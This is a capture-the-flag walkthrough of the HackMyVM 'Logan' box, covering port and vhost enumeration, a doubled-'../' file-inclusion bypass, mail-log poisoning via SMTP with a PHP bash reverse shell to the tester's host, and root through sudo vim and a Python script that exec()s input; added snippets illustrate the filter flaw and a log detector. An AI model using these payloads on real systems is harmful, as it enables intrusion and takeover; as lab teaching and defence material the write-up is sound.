hack-my-vm-logan

Port scanning

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.178.51                                     [22:14:51]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 22:15 CST
Nmap scan report for logan.hmv (192.168.178.51)
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
MAC Address: 08:00:27:3F:E5:DD (Oracle VirtualBox virtual NIC)

Now a deeper scan of the two open ports

kali@kali [~] ➜  sudo nmap -sT -sV -sC -O -p25,80 192.168.178.51                                      [22:15:23]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 22:15 CST
Nmap scan report for logan.hmv (192.168.178.51)
Host is up (0.00053s latency).

PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=logan
| Subject Alternative Name: DNS:logan
| Not valid before: 2023-07-03T13:46:49
|_Not valid after: 2033-06-30T13:46:49
|_smtp-commands: logan.hmv, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Logan
MAC Address: 08:00:27:3F:E5:DD (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: logan.hmv

Service exploitation

Start with port 80.

kali@kali [~] ➜  curl http://192.168.178.51                                                           [22:16:03]
<meta http-equiv="refresh" content="0; url=http://logan.hmv/" />

As you can see, this is just a redirect; add a hosts entry for logan.hmv and the site becomes reachable.


The page itself has nothing of value, so go straight to directory brute-forcing.

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://logan.hmv/  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://logan.hmv/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 307] [--> http://logan.hmv/images/]
/css (Status: 301) [Size: 304] [--> http://logan.hmv/css/]
/js (Status: 301) [Size: 303] [--> http://logan.hmv/js/]
/javascript (Status: 301) [Size: 311] [--> http://logan.hmv/javascript/]
/server-status (Status: 403) [Size: 274]
Progress: 220561 / 220562 (100.00%)
===============================================================
Finished
===============================================================

Still nothing useful, so fuzz for virtual-host subdomains next.

kali@kali [~] ➜  wfuzz -w /home/kali/web_shell_toos/subdomains-top1million-5000.txt -u http://logan.hmv -H "Host: FUZZ.logan.hmv" --hh 65        [22:20:31]

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://logan.hmv/
Total requests: 4989

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000024: 200 62 L 101 W 1112 Ch "admin"

Total time: 0
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 0

That gives us a subdomain; let's take a look at it.


There is a file upload; uploading has basically no restrictions, but we cannot find where the uploaded file ends up, so it does not seem useful. Looking at the other features: the second link is a 404 and can be ignored, and the third appears to have a file inclusion.


This file parameter almost certainly has an inclusion vulnerability. Meanwhile, the directory scan of the subdomain has finished as well.

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://admin.logan.hmv/                 [22:21:21]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://admin.logan.hmv/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 323] [--> http://admin.logan.hmv/javascript/]
/payments (Status: 301) [Size: 321] [--> http://admin.logan.hmv/payments/]
/server-status (Status: 403) [Size: 280]
Progress: 220561 / 220562 (100.00%)
===============================================================
Finished
===============================================================

The only useful finding is the directory that the file parameter includes from, but the file we uploaded is not in that directory.

kali@kali [~] ➜  curl http://admin.logan.hmv/payments/01                                                                                         [22:23:32]
Company: Tinder
Date: 02/05/2023
Amount: 1000$

All we can do is keep testing the file parameter. It turns out ../ is filtered, and writing the sequence twice bypasses the filter.
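The filter only works once over the input, which is exactly why the doubled form survives it. The Python below is an added illustration, not code from the box or the writeup: it contrasts that sanitise-then-join logic with a resolver that canonicalises the path and rejects anything outside the include base. The include base is the one observed in the writeup; the payload string and function names are constructed.

```python
import os
from typing import Optional

# Include base seen in the writeup: the directory admin.logan.hmv/payments/ serves from.
INCLUDE_BASE = "/var/www/admin/payments"

def strip_once(user_path: str) -> str:
    """The weak filter: delete every '../' in one pass and trust the result."""
    return user_path.replace("../", "")

def vulnerable_include_path(user_path: str) -> str:
    """Sanitise-then-join, the logic the file parameter effectively implements.
    Pure string operations, so the demo runs without touching the disk."""
    return os.path.normpath(os.path.join(INCLUDE_BASE, strip_once(user_path)))

def resolve_safely(user_path: str, base: str = INCLUDE_BASE) -> Optional[str]:
    """Hardened: never rewrite the input; canonicalise, then reject anything outside base."""
    if "\x00" in user_path or os.path.isabs(user_path):
        return None
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    if candidate == base_real or candidate.startswith(base_real + os.sep):
        return candidate
    return None

# Constructed payload (the writeup does not print its own). Each '....//' loses the
# '../' in its middle after one pass, leaving exactly '../' behind.
DOUBLED = "....//....//....//....//etc/passwd"

if __name__ == "__main__":
    print("after one pass :", strip_once(DOUBLED))                  # ../../../../etc/passwd
    print("vulnerable     :", vulnerable_include_path(DOUBLED))     # /etc/passwd
    print("hardened       :", resolve_safely(strip_once(DOUBLED)))  # None
```

Note that resolve_safely(DOUBLED) is not None: the doubled string is a harmless, nonexistent subpath until a filter rewrites it into traversal, which is why the hardened version rejects instead of cleaning.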


But what to include is the question; in this situation it can only be system files. That brings to mind the as-yet-unused port 25, which is used to send mail. Before going there, let's brute-force system file paths to see which ones can be included and actually return content.


The conclusion is that web log inclusion is not possible, because including Apache2's default log path returns nothing, so the only option is to include /var/log/mail.log. When we send mail over SMTP on port 25, some of what we send is recorded in that log; we just need to turn that recorded information into a reverse shell.

The SMTP service is used as follows:

HELO kali.local
MAIL FROM:<sender@example.com>
RCPT TO:<www-data@logan.hmv>
DATA
Subject: Test Email

AAAAAAAAAAAAAAAAAA
.
QUIT

The MAIL FROM and RCPT TO values are both written to /var/log/mail.log, so we inject there.

kali@kali [~] ➜  telnet 192.168.178.1 25                                                                                                         [19:22:41]
Trying 192.168.178.1...
Connected to 192.168.178.1.
Escape character is '^]'.
220 logan.hmv ESMTP Postfix (Ubuntu)
HELO kali.local
250 logan.hmv
MAIL FROM:<sender@example.com>
250 2.1.0 Ok
RCPT TO:<?php exec("bash -c 'bash -i >& /dev/tcp/192.168.178.141/8888 0>&1'")?>
501 5.1.3 Bad recipient address syntax
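From the defender's side, the property that makes this work, Postfix writing the raw sender and recipient to mail.log even when it rejects the command, is also what makes it easy to detect. The Python below is an added example, not part of the writeup: it scans constructed Postfix smtpd log lines for PHP open tags, code-execution calls and from/to values that are not mailbox addresses, and reports the client IP. The sample lines follow standard Postfix format but are constructed, not copied from the box.

```python
import re
from typing import Dict, List

# Constructed sample in Postfix smtpd log format (not copied from the box).
# Line 2 shows the pattern the writeup relies on: the address is rejected with
# 501 5.1.3, yet Postfix still records the raw value in mail.log.
SAMPLE_MAIL_LOG = """\
Mar 18 19:22:41 logan postfix/smtpd[861]: connect from unknown[192.168.178.141]
Mar 18 19:22:50 logan postfix/smtpd[861]: NOQUEUE: reject: RCPT from unknown[192.168.178.141]: 501 5.1.3 Bad recipient address syntax; from=<sender@example.com> to=<?php echo 1; ?> proto=SMTP helo=<kali.local>
Mar 18 19:23:10 logan postfix/smtpd[861]: 4ABC12: client=unknown[192.168.178.141]
Mar 18 19:23:12 logan postfix/qmgr[512]: 4ABC12: from=<sender@example.com>, size=312, nrcpt=1 (queue active)
Mar 18 19:24:00 logan postfix/qmgr[512]: 4ABC13: from=<>, size=1200, nrcpt=1 (queue active)
"""

PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
DANGEROUS_CALL = re.compile(r"\b(?:exec|system|passthru|shell_exec|popen|eval)\s*\(", re.IGNORECASE)
CLIENT_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
ADDR_FIELD = re.compile(r"\b(from|to)=<([^>]*)>")

def inspect_mail_log(text: str) -> List[Dict]:
    """Return one finding per suspicious line: line number, client IP and the reasons."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        reasons = []
        if PHP_TAG.search(line):
            reasons.append("php_open_tag")
        if DANGEROUS_CALL.search(line):
            reasons.append("code_execution_call")
        for field, value in ADDR_FIELD.findall(line):
            # from=<> is the legitimate null sender used by bounces; anything
            # else in from=/to= is expected to look like a mailbox address.
            if value and "@" not in value:
                reasons.append(f"{field}_not_an_address")
        if reasons:
            ip = CLIENT_IP.search(line)
            findings.append({"line": lineno, "client": ip.group(1) if ip else None, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in inspect_mail_log(SAMPLE_MAIL_LOG):
        print(finding)
```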

The reverse shell comes back once the poisoned log is included.

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [19:18:39]
listening on [any] 8888 ...
connect to [192.168.178.141] from (UNKNOWN) [192.168.178.1] 53578
bash: cannot set terminal process group (861): Inappropriate ioctl for device
bash: no job control in this shell
www-data@logan:/var/www/admin$ ls
ls
index.html
payments
payments.php
upload.php

Privilege escalation

www-data@logan:/var/www/admin$ sudo -l                                                                                                                      
Matching Defaults entries for www-data on logan:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User www-data may run the following commands on logan:
(logan) NOPASSWD: /usr/bin/vim
www-data@logan:/var/www/admin$ sudo -u logan /usr/bin/vim 
!/bin/bash
logan@logan:/var/www/admin$ id
id
uid=1000(logan) gid=1000(logan) groups=1000(logan),27(sudo),1002(administration)

That gives us the user account.

logan@logan:/var/www/admin$ sudo -l
sudo -l
Matching Defaults entries for logan on logan:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User logan may run the following commands on logan:
(root) NOPASSWD: /usr/bin/python3 /opt/learn_some_python.py
logan@logan:/var/www/admin$ sudo /usr/bin/python3 /opt/learn_some_python.py
sudo /usr/bin/python3 /opt/learn_some_python.py
Welcome!!!

The first you need to now is how to use print, please type print('hello')

print('hello word')
print('hello word')
hello word

It looks like the script executes a single Python statement of our choosing.

logan@logan:/var/www/admin$ sudo /usr/bin/python3 /opt/learn_some_python.py
sudo /usr/bin/python3 /opt/learn_some_python.py
Welcome!!!

The first you need to now is how to use print, please type print('hello')

import pty; pty.spawn("/bin/bash")
import pty; pty.spawn("/bin/bash")
root@logan:/var/www/admin#

That gives us root.

It does indeed execute the input directly.

root@logan:/home/logan# cat  /opt/learn_some_python.py
cat /opt/learn_some_python.py
print("Welcome!!!")
comand = input("\n The first you need to now is how to use print, please type print('hello')\n\n")
exec(comand)